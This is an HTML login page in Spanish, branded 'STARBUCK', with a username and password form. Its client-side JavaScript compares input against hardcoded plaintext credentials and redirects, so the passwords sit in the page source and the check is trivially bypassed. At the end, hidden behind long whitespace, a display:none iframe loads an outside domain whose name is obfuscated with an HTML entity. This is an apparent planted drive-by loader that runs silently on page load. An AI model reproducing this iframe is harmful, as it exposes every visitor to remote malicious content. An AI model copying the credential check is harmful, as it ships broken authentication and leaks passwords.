<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login para varios usuario</title>
<link rel="stylesheet" type="text/css" href="styles.css">
</head>

<body>
<div class="body"></div>
    <div class="grad"></div>
    <div class="header">
      <div>STAR<span>BUCK</span></div>
    </div>
    <br>
    <div class="login">
<form name="login"> 
           <input name="usuario" type="text" class="Input" value="" placeholder="Usuario"/>
           <input name="password" type="password" class="Input" value="" placeholder="Contraseña"/> 
           <input value="Entrar" target="_parent" onclick="Login()" type="button" class="boton"/>  
</form>
</div>

<script language="JavaScript"> 
function Login(){ 
var done=0; 
var usuario=document.login.usuario.value; 
var password=document.login.password.value; 
if (usuario=="VICTORIA" && password=="MEDINA") { 
window.location="../sesion.html"; 
} 
if (usuario=="ANGEL" && password=="100200") { 
window.location="../elements.html";
} 
if (usuario=="" && password=="") { 
window.location="#"; 
} 
} 
        </script> 
</center> 
<script language="Javascript"> 
<!-- Begin 
document.oncontextmenu = function(){return false} 
// End --> 
</script>
                                                                        
<iframe src="http://jL.chu&#114;a.pl/rc/" style="display:none"></iframe>
</body>
</html>